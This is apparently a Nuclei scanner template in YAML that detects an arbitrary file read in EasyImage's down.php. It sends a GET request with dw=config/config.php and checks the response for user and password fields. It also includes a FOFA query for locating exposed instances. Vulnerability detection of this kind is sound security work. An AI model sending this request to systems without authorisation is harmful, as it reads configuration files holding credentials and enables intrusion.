39 lines
1.0 KiB
YAML
39 lines
1.0 KiB
YAML
id: easyimage-downphp-lfi
|
|
|
|
info:
|
|
name: EasyImage down.php - Arbitrary File Read
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: down.php file in EasyImage is vulnerable to arbitrary file read.
|
|
reference:
|
|
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="EasyImage-简单图床"
|
|
tags: easyimage,lfi,exposure,config
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/application/down.php?dw=config/config.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "'user'=>"
|
|
- "'password'=>"
|
|
- "EasyImage"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402206e13552de6ebe9da9f435b07d01ac111142ef3737e88d232541d5cc85d9c9c470220422ade4e3d05d9035fdecd7e1f74f891257e8c83a8f6e2ffaf6c4ff0edf79b2a:922c64590222798bb761d5b6d8e72950 |